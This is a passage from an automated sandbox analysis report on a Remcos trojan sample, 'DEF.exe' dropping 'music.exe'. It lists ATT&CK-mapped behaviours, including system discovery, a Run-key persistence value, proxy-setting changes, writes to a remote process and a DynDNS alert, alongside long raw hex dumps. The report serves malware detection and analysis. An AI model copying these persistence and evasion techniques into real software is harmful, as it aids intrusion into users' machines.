1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600dee4277b98da12006d82097644c81b0004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2b8f7704e98a77d8eb1176ac0117000000170000000000000000000900cf00da030000000000000000000000000000000000000a00ca00da0300000000000000000000106e170000000000200000000000000000000000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff8a010000040000000100000032000200820081000300000001000000106e1700dd579077106e1700f80700002000000068c88a770000000038e11c00006b1700206c170048141e00c86f17000c00a5005ce312009ce3120004e5120095e18b7754301700feffffffff2b8f779a2a8f77d00b1e000000000000000000010000000000000018e11c00006b17001c6c1700d00b1e00606f1700f054ed83a8e31200b16e726f04e5120095e18b7754301700feffffffff2b8f779a2a8f772c9b5a76000000002c9b5a76000000000200000000000000d00b1e0048141e00d00b1e00 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f002cd81200b344416b05000000000000000000000000000000000000000000000000000000d802000000000000000000000000000044df1200a1dae67be8dc1200e8dc12005ecbcd76d802000000000000005dcb7644df12000e5dcb76dcda1200dcaacf76010000000000000072000000ffffffffffffffff64d8120078020000000000002500000064d812007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036003ae6277bbcd812006d820976ac59210004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff20009c0064001000620bcd7600000000106e17000000000050000000cca61d0002000000e0f91a00000000000100000800001e0038721700380bcd76f0d6120002000000c01900000000170098592100f83b0000ff07000000001700000000007f070000c4001700e02d1700c9500000d0d7120067e58c7700001700985921000000000000001700000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360056e9277b10d812006d820976ac59210004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600aeef277b28d112006d8209764c5b210004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f00ccc21200b344416b09000000000000000000000000000000000000000000000000000000d8020000000000000000000000000000e4c9120001cfe67b88c7120088c712005ecbcd76d802000000000000005dcb76e4c912000e5dcb767cc51200dcaacf7601000000000000007a000000ffffffffffffffff04c3120078020000000000002500000004c312007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036009afd277b5cc312006d820976446a210004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000017000020000070361c00c4c2120004648f7738011700e0638f7780ee8a77000000000000170078361c000000000082288f77340000c0f0c11200c019000000001700306a2100f83b0000ff07000000001700000000007f070000c4001700e02d1700b64e000070c2120067e58c7700001700306a21000000000000001700000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360036fc277bb0c212006d82097684361c0004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000e85277bc8bb12006d820976446a210004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001a001cb81200b344416b0a000000000000000000000000000000000000000000000000000000d802000000000000000000000000000034bf1200b1bae67bd8bc1200d8bc12005ecbcd76d802000000000000005dcb7634bf12000e5dcb76ccba1200dcaacf7601000000000000007c000000ffffffffffffffff54b8120078020000000000002500000054b812007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002a86277bacb812006d8209766c6c210004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100003b00000000170000000000f870210010b8120004648f7738011700e0638f7702000000e0f91a000000000001000008d4b6120000000001bcc79777c0c797770a00000094b712003f083d7602000000e0f91a00000000000100001888fb3c7684b71200c81ccf765ab9120095fb3c76b8b81200e0f91a0000000000000000000000000040b81200000017007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036004689277b00b812006d8209766c6c210004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f002cd81200b344416b050000000000000000000000000000000000000000000000000000000003000000000000000000000000000044df1200a1dae67be8dc1200e8dc12005ecbcd760003000000000000005dcb7644df12000e5dcb76dcda1200dcaacf76010000000000000072000000ffffffffffffffff64d8120078020000000000002500000064d812007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036003ae6277bbcd812006d820976540c170004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff1f00a70076001000620bcd7600000000106e17000000000050000000cca61d0002000000e0f91a00000000000100000858001e0038721700380bcd76f0d6120002000000a4d712003f083d7602000000e0f91a00000000000100001888fb3c7694d71200c81ccf766ad9120095fb3c76c8d81200e0f91a0000000000000000000000000050d81200000017007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360056e9277b10d812006d820976540c170004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600aeef277b28d112006d820976540c170004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e00ccc21200b344416b0900000000000000000000000000000000000000000000000000000000030000000000000000000000000000e4c9120001cfe67b88c7120088c712005ecbcd760003000000000000005dcb76e4c912000e5dcb767cc51200dcaacf7601000000000000007a000000ffffffffffffffff04c3120078020000000000002500000004c312007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036009afd277b5cc312006d820976d4fd220004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000014010000010000000000000001cf6d6c0c6c7056657273696f6e496e666f726d6174696f6e000000000000000000000000000000000000000000006dcfe67b94c11200000000002cea120040b1426b6d71b010feffffff2cc212003093987538c2120000000000e4ff220058c3120024c4cd763ec4cd761c0100000600000001000000b11d0000000017007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360036fc277bb0c212006d820976d4fd220004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000e85277bc8bb12006d8209767403230004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000020001cb81200b344416b0a0000000000000000000000000000000000000000000000000000000003000000000000000000000000000034bf1200b1bae67bd8bc1200d8bc12005ecbcd760003000000000000005dcb7634bf12000e5dcb76ccba1200dcaacf7601000000000000007c000000ffffffffffffffff54b8120078020000000000002500000054b812007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002a86277bacb812006d8209763c2b230004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100003b00000000170000000000c82f230010b8120004648f7738011700e0638f7702000000e0f91a000000000001000008d4b6120072006f01bcc79777c0c797770a00000094b712003f083d7602000000e0f91a00000000000100001888fb3c7684b71200c81ccf765ab9120095fb3c76b8b81200e0f91a0000000000000000000000000040b81200000017007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036004689277b00b812006d8209763c2b230004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100c4b21200b344416b0800000000000000000000000000000000000000000000000000000000030000000000000000000000000000dcb9120019bfe67b80b7120080b712005ecbcd760003000000000000005dcb76dcb912000e5dcb7674b51200dcaacf76010000000000000078000000fffffffffffffffffcb21200780200000000000025000000fcb212007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600928d277b54b312006d820976dc2f230004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100003b0000000017000000000068352300b8b2120004648f7738011700e0638f7702000000e0f91a0000000000010000087cb1120000000001bcc79777c0c797770a0000003cb212003f083d7602000000e0f91a00000000000100001888fb3c762cb21200c81ccf7602b4120095fb3c7660b31200e0f91a00000000000000000000000000e8b21200000017007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002e8c277ba8b212006d820976dc2f230004010000 (UID: 00000000-00006032)\n \"DEF.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f00d4d21200b344416b0900000000000000000000000000000000000000000000000000000000030000000000000000000000000000ecd9120009dfe67b90d7120090d712005ecbcd760003000000000000005dcb76ecd912000e5dcb7684d51200dcaacf7601000000000000007a000000ffffffffffffffff0cd312007802000000000000250000000cd312007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e2ed277b64d312006d820976540c170004010000 (UID: 00000000-00006032)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"DEF.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006032)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"DEF.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-13", "type": 3, "relevance": 3, "name": "Reads the windows installation date", "description": "\"DEF.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\"; Key: \"INSTALLDATE\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"DEF.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\MUSIC.EXE\")\n \"DEF.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\MUSIC.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"DEF.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"DEF.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API's typically used for searching a directory for a files", "description": "\"DEF.exe\" called \"FindFirstFileW\" with parameter %PROGRAMFILES%\\MICROS~3\\Office14\\*.* (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter 1033 (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter 1036 (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter 3082 (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ACCDDS.DLL (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ACCDDSF.DLL (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ACCDDSLM.DLL (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter AccessWeb (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ACCICONS.EXE (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ACCVDT.DLL (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ACCWIZ (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ACCWIZ.DLL (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ACEDAO.DLL (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ADDINS (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ADVCMP.DIC (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ADVTEL.DIC (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ADVZIP.DIC (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter ASCIIENG.LNG (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter AUDIOSEARCHLTS.DLL (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter AUDIOSEARCHMAIN.DLL (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter AUDIOSEARCHSAPIFE.DLL (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter AUTHZAX.DLL (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter BCSAutogen.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"FindNextFileW\" with parameter BCSClient.Msg.dll (UID: 00000000-00006032)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"DEF.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"music.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"music.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"DEF.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00006032)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /json.gp\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"netCache\" in header \"GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"DEF.exe\" opened \"\\Device\\KsecDD\"\n \"music.exe\" opened \"\\Device\\KsecDD\"\n \"svchost.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"DEF.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"DEF.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"DEF.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"DEF.exe\" reads file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\desktop.ini\"\n \"DEF.exe\" reads file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini\"\n \"DEF.exe\" reads file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini\"\n \"DEF.exe\" reads file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"DEF.exe\" has resource with unusual entropy \"RT_RCDATA:7.72328510352\"\n \"music.exe\" has resource with unusual entropy \"RT_RCDATA:7.72328510352\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"DEF.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"DEF.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-GHRUZU\"; Value: \"\"%ALLUSERSPROFILE%\\db\\music.exe\"\")\n \"DEF.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"DEF.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-GHRUZU\"; Value: \"\"%ALLUSERSPROFILE%\\db\\music.exe\"\")\n \"music.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"music.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-GHRUZU\"; Value: \"\"%ALLUSERSPROFILE%\\db\\music.exe\"\")\n \"music.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"music.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-GHRUZU\"; Value: \"\"%ALLUSERSPROFILE%\\db\\music.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"music.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\db\\music.exe]- [targetUID: 00000000-00006032]\n \"DISMHOST.EXE.6712F542.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"music.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "section contains high entropy", "description": "\"DEF.exe\" has section name .text with entropy \"6.62739369218\"\n \"DEF.exe\" has section name .reloc with entropy \"6.72376821809\"\n \"music.exe\" has section name .text with entropy \"6.62739369218\"\n \"music.exe\" has section name .reloc with entropy \"6.72376821809\"\n \"DISMHOST.EXE.6712F542.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.6712F542.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"DEF.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"DEF.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "suricata-1", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET DYN_DNS DNS Query to DynDNS Domain *.zapto .org\" (SID: 2028703, Rev: 2, Severity: 2) categorized as \"Potentially Bad Traffic\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "target-58", "type": 9, "relevance": 10, "name": "The analysis spawned a process that was identified as malicious", "description": "16/23 Antivirus vendors marked spawned process \"music.exe\" (PID: 6012) as malicious (classified as \"Trojan.Remcos\" with 69% detection rate)\n 16/23 Antivirus vendors marked spawned process \"music.exe\" (PID: 4492) as malicious (classified as \"Trojan.Remcos\" with 69% detection rate)", "origin": "Monitored Target", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "16/23 Antivirus vendors marked dropped file \"music.exe\" as malicious (classified as \"Trojan.Remcos\" with 69% detection rate)\n 16/23 Antivirus vendors marked dropped file \"music.exe.bin\" as malicious (classified as \"Trojan.Remcos\" with 69% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"DEF.exe\" (UID: 00000000-00006032)\n Spawned process \"music.exe\" (UID: 00000000-00006012)\n Spawned process \"svchost.exe\" (UID: 00000000-00004364)\n Spawned process \"music.exe\" (UID: 00000000-00004492)\n Spawned process \"svchost.exe\" (UID: 00000000-00005004)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"DEF.exe\" wrote 32 bytes to a remote process \"C:\\ProgramData\\db\\music.exe\" (Handle: 1056)\n \"DEF.exe\" wrote 52 bytes to a remote process \"C:\\ProgramData\\db\\music.exe\" (Handle: 1056)\n \"DEF.exe\" wrote 4 bytes to a remote process 